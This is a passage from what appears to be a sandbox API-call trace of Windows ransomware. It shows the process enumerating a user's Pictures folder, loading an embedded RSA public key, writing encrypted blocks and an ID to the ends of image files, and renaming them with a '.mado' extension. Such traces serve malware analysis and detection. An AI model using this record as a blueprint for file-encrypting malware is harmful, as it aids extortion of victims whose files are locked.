(HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.021] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\") returned="GVo5E\\" [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b671e0 [0206.021] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\") returned="8522zzaC3XYMo_\\" [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0206.021] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66c90 [0206.021] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0206.021] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.021] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.021] PathFindFileNameW (pszPath="") returned="" [0206.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.021] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc3c31cd0, ftCreationTime.dwHighDateTime=0x1d5e81c, ftLastAccessTime.dwLowDateTime=0xd384ea70, ftLastAccessTime.dwHighDateTime=0x1d5dc52, ftLastWriteTime.dwLowDateTime=0xd384ea70, ftLastWriteTime.dwHighDateTime=0x1d5dc52, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.023] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc3c31cd0, ftCreationTime.dwHighDateTime=0x1d5e81c, ftLastAccessTime.dwLowDateTime=0xd384ea70, ftLastAccessTime.dwHighDateTime=0x1d5dc52, ftLastWriteTime.dwLowDateTime=0xd384ea70, ftLastWriteTime.dwHighDateTime=0x1d5dc52, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.024] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fdfd60, ftCreationTime.dwHighDateTime=0x1d5ddb2, ftLastAccessTime.dwLowDateTime=0x8e1e1cd0, ftLastAccessTime.dwHighDateTime=0x1d5e437, ftLastWriteTime.dwLowDateTime=0x8e1e1cd0, ftLastWriteTime.dwHighDateTime=0x1d5e437, nFileSizeHigh=0x0, nFileSizeLow=0x76eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lRzHX-uMr5BJqsBd.gif", cAlternateFileName="LRZHX-~1.GIF")) returned 1 [0206.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0206.024] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\lRzHX-uMr5BJqsBd.gif") returned=".gif" [0206.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\lRzHX-uMr5BJqsBd.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\lrzhx-umr5bjqsbd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.024] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=30443) returned 1 [0206.024] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.026] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x76c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.027] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.028] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x76eb, lpOverlapped=0x0) returned 1 [0206.029] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.029] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.029] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.029] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0206.030] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.030] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.030] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.030] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.030] GetLastError () returned 0x0 [0206.030] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.030] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0206.030] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.030] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.030] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.030] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.031] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x76eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.031] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.031] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.031] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.031] CloseHandle (hObject=0x63c) returned 1 [0206.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0206.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b7b950 [0206.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0206.032] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\lRzHX-uMr5BJqsBd.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\lrzhx-umr5bjqsbd.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\lRzHX-uMr5BJqsBd.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\lrzhx-umr5bjqsbd.gif.mado")) returned 1 [0206.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.033] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.034] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1c8e90, ftCreationTime.dwHighDateTime=0x1d5e745, ftLastAccessTime.dwLowDateTime=0x1ebe7bb0, ftLastAccessTime.dwHighDateTime=0x1d5e34b, ftLastWriteTime.dwLowDateTime=0x1ebe7bb0, ftLastWriteTime.dwHighDateTime=0x1d5e34b, nFileSizeHigh=0x0, nFileSizeLow=0xae4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rywMC5aBtOT7mD.png", cAlternateFileName="RYWMC5~1.PNG")) returned 1 [0206.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0206.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.034] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\rywMC5aBtOT7mD.png") returned=".png" [0206.034] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\rywMC5aBtOT7mD.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\rywmc5abtot7md.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.034] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=44618) returned 1 [0206.035] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.037] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xae24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.037] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.038] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.038] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xae4a, lpOverlapped=0x0) returned 1 [0206.039] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.039] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.039] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.039] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0206.040] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.040] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.040] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.040] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.040] GetLastError () returned 0x0 [0206.040] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.040] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0206.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.040] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.040] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.040] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xae50) returned 0x3b81690 [0206.041] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.041] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.041] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xae4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.041] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, 